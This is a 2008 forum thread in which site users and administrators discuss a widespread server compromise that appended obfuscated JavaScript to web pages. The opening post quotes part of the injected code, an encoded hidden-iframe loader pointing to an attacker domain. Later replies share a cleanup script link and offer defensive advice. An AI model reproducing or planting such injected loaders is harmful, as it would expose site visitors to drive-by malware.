Hey admins - URGENT.

Discussion in 'General chat' started by dgriffith, Oct 23, 2008.

  1. dgriffith

    dgriffith Junior Member

    Joined:
    Nov 30, 2006
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    0
    I debated whether to just PM the site admins, or post this message here. I decided here, as I don't know when an admin will next be online, as only 9anda1f seems to have been here in the last 24 hours, and I think it's a little important for visitors to be aware of it. Long story short for anyone else reading - if your PC has opened up Acrobat Reader on loading the index page here, better scan your computer for bugs. Probably nothing serious, but one never knows.


    Ok.
    Seem to have come across a little webbug - Who can edit the index.php page?

    I keep getting popups when I arrive at the front page that attempt to load a pdf. So, I opened the page source up and found this immediately suspicious bit at the end:

    Code:
     var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = ""; 
    for(var i=0;i
     
  2. Mrs Parker-Bowles

    Mrs Parker-Bowles Junior Member

    Joined:
    Nov 10, 2006
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Hey,

    I had the same thing happen to me today. Good on you Dave for exploring.
    I have been bumped into threads twice today - hand wasn't even on the mouse. A bit strange but, is it related??
    I also recieved an email telling me I had a response to a thread I posted on earlier today but, when I got there there was nothing. In fact when I logged on it took me into the "permaculture for the classroom ideas" thread, not the one I'd posted in.
    I don't know if this is relevant Dave - you mentioned that it appears to be windows only. I'm running Mac OSX.

    We certainly are being being bombarded with crap here lately.

    Anyway, hope this helps.
     
  3. 9anda1f

    9anda1f Administrator Staff Member

    Joined:
    Jul 10, 2006
    Messages:
    3,046
    Likes Received:
    199
    Trophy Points:
    63
    Gender:
    Male
    Location:
    E Washington, USA
    Climate:
    Semi-Arid Shrub Steppe (BsK)
    Re: Hey admins - URGENT.

    Thanks dg, it's happening to me also. I'll pm Murray.
     
  4. jmbullis

    jmbullis Guest

    Re: Hey admins - URGENT.

    Hi Guys,

    Our server got hit by this same issue this morning around 8 o'clock CST. I did a search for the domain that was coming up on Google and came across this post. One thing I noticed is that our server and the Permaculture server are both being hosted by Layered Technologies. Is this just a coincidence? I am wondering if there are other Layered Tech clients out there with the same issue today.

    James Bulils
    Xeal.com
     
  5. sunnyslopes

    sunnyslopes Junior Member

    Joined:
    May 1, 2008
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Hello :) Same problem here. Norton is blocking the attacks for now. Dam those anarcists.
     
  6. nickggr

    nickggr Guest

    Re: Hey admins - URGENT.

    Even this forum here is infected. :(
    I have a dedicated server hosting about 40 sites and all of them where infected too. I managed to create a PHP script that cleaned all the infected files and everything is back to normal again, but now I try to figure how this worm attacked, to prevent it from doing it again...
     
  7. ronhere

    ronhere New Member

    Joined:
    Oct 23, 2008
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Are your sites hosted on layeredtech..??

    I just google with the script code and found this forum ..Unfortunately..even our server has been attacked with the same script and it is effecting all the sites in our server..

    Can niggr also share the php script to overcome this problem..We have about 80 sites and it is not possible to edit the files manually..and I am no coder..

    Thanks and looking for your response.

    Ron
     
  8. marion

    marion New Member

    Joined:
    Oct 23, 2008
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    We're also being affected, and yes we're with Layered as well. One of the issues were having is that our files are being changed to the root user and we can't change them.
     
  9. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Good detective work Dave ! FWIW... I ran into this once already, and I'm on OSX 10.5.5. If it's a JS issue, everyone will get it (possibly browser dependent), but it may not effect the target OS if it's not Windows. Also, FWIW, phpBB is widely used, so is one of the most popular systems out there in terms of targeting exploits.

    Hahaha... SEE ! I just clicked the "preview" button, and I got sent to the Hui1-Hui1 script !
     
  10. Khuffie

    Khuffie New Member

    Joined:
    Oct 23, 2008
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Would you be able to email me that PHP script you wrote? I am having that same issue. It's my username @ gmail.com. Thanks!

    For the record, I am on BurstNET. ALL .php and .html files across my whole server have been affected it seems, and that code was splattered on the bottom. Not sure what the exploit is.
     
  11. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    On a side note, my vote is having the Permaculture assets "not" be on an OSS architecture... I believe it should be on a custom system.
    Primary reason are things like this, and also, the importance of the data being secure. Some see permaculturists as activists, and it wouldn't take much for a governmental agency to compromise the entire system. Not trying to play the paranoia role, but, it's true.

    As the Permaculture Master Plan fleshes out, I'll throw my vote in for it being an "extremely secure and proprietary" system. I'm all for OSS, but you don't run a bank (or seed bank!) completely on OSS :)
     
  12. marion

    marion New Member

    Joined:
    Oct 23, 2008
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    We've been told it's a PHP exploit and not related to software such as phpBB, WordPress and etc.
     
  13. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    It's a browser exploit, and can be pushed to the client in any language.

    The fact that the Javascript is being served in the first place sounds like it must be a PHP exploit (which I would love to have the link to, as such exploits are usually fixed and published promptly (in that order)). It would be much more realistic if the Javascript entered into the system through the software itself.
     
  14. nickggr

    nickggr Guest

    Re: Hey admins - URGENT.

    Hello everyone, after your requests I have uploaded here the PHP script I created for cleaning the infected files.

    https://www.savefile.com/files/1855155

    It is 100% safe but if you don't trust it you can ask anyone with knowledge of PHP to review its code.

    Warning: you must have root access to your server and you must run this script from the shell as a root user
    (it will not work correctly if you open it in your browser)

    Usage: upload the file clean.php in the directory you want to clean and simply run the following command on your shell:

    php clean.php

    It will clean all PHP, HTML, HTM and TPL files not only in the current directory, but in the whole subdirectory tree where you have uploaded this file. If there are thousands of files and subdirectories under the current directory, the script may appear frozen for the first seconds or minutes after you give the above command, so don't worry, it is normal. After this it will begin informing you about the cleaning process of each file.

    For instance, if you upload this script in your public_html directory it will clean all the files on your site.

    Alternatively you can give the command:

    php clean.php /path/to/directory

    to clean a directory different than this where you have uploaded clean.php

    Although I have tested it on my server, cleaned more than 10000 files in 2 minutes and have got no problems, I suggest you backup your current files just in case...

    Good luck!

    Maybe the same can be done with a Perl or shell script, but I am not so good with these, so I used PHP. :)
     
  15. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    You rock Nick ! Quick question, could the exploit in question be anywhere on the page, not just immediately after the body tag ? Maybe just a global replace of the script tag itself (minus any outlining html elements) ?

    Also... how did this happen in the first place ?
     
  16. nickggr

    nickggr Guest

    Re: Hey admins - URGENT.

    The exploit code is inserted right after the tag in every page. But my clean script removes it no matter where the code could be in the page.

    I have no idea either how the exploit infected our sites... I have not found anything suspicious yet in my Apache logs. I have noticed that all infected files have changed their owner to root, so maybe a Linux kernel issue or somebody breaking the root password?
     
  17. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Nick, yeah, good question. I'd highly doubt it was a kernel issue, or an OS layer issue... and I'd bet on it being at the application level. Someone targeting a range of IP's, gaining root access and chown'ing web application directories (which may be located anywhere) seems a bit far fetched.

    Are you running phpBB, phpCMS, Plone, Drupal, or is your system custom ? I'm willing to bet that it was a simple URI or multipart hack against one of these systems. It could indeed be a PHP specific issue... but, that is a bit more far fetched as well.

    The plot thickens ! As a nerd, I'm interested in helping to get to the bottom of it if possible :D
     
  18. fr34k123

    fr34k123 Guest

    Re: Hey admins - URGENT.

    Hi,
    I have been following this topic - due to earlier errors on my site.

    I contacted my hosts who indeed have confirmed my VPS container was hacked. We are running php 5.2 and use raven nuke fully up to date and nuke sentinel (again fully up to date).

    I have logged in to my FTP and can see that almost every folder/file has an edited date of today - so this ios defintely gonna take some time to sort out.

    I'm afriad most hosts wont sort out the problem and all files needs to be manually edited by hand to remove this code - and as of yet no way of knowing if it will keep returning - as we all know hackers don't stop!!!

    I have downloaded your clean.php script (forgive my noobness to all this) - and i usually have a guy deal with all the in depth technical stuff with my site - but currently he's away and so it means i will have to sort out thgis problem on my own :(.

    I currently have cpanel access and WHM access - in a brief outline - can you advise me of how i would run this script through shell access?

    Thanks
     
  19. dgriffith

    dgriffith Junior Member

    Joined:
    Nov 30, 2006
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    Well! Seems to be a widespread problem across a number of sites. Have to wonder what the point of entry is. Hopefully everyone can get things sorted out on their respective sites soon enough.

    A quick temporary fix for users is to either disable javascript (not real good) or block hu1-hu1.cn from loading with your favorite ad-blocker, or set hu1-hu1.cn to 127.0.0.1 in your HOSTS file.

    This is a good a reason as any to promote Firefox, so I'll describe how to do it with Firefox and Ad-Block Plus :)

    1. Get Firefox Here
    2. Get Ad-Block Plus extension here
    3. Open the forum page, press "escape" when it all displays to stop it loading the hu1-hu1 page.
    4. Click on the little ABP stop-sign icon at the top right of the screen.
    5. Scroll down the list of items until you see the hu1-hu1.cn item, highlight and press enter.
    6. A list of the currently-blocked items will appear, and hu1-hu1.cn should be on it. Press OK.
    7. You've now filtered the bug and you're right to go.

    Cheers and good luck to everyone cleaning this mess up :)

    Dave
     
  20. dylanz

    dylanz Junior Member

    Joined:
    Nov 8, 2007
    Messages:
    122
    Likes Received:
    1
    Trophy Points:
    0
    Re: Hey admins - URGENT.

    +1 for Firefox !

    Realized someone mentioned FTP'ing into their site... that is the first security hole !!!
    Many PHP users seem to update sites this way, which is definitely not a good idea. You should always connect to your machines though an ssh tunnel !! Using straight FTP, you may as well post your IP and login credentials to this forum right now :D

    On the topic at hand, simply removing the JS from the infected files is probably not enough. The files where chown'ed, which requires root access (or a sudoer, but this is probably a root attack). Personally, I would consider the machines compromised, and start over. Diff your current code repository against your last safe revision (you are using revision control, right ?), then back up that version, and reinstall the OS / VM.

    Unless you are a system administrator who has done careful auditing of your machine, it would be almost impossible to tell what has changed on the machines (ie: backdoors installed) if the intruder was smart. This looks like a pretty wide spread attack from the looks of it, and I err on being safe then sorry... unless you want something similar or worse cropping up soon.

    What a pain... I bet if the attacker knew what permaculture was, they would have added this site to their whitelist :)
     

Share This Page

-->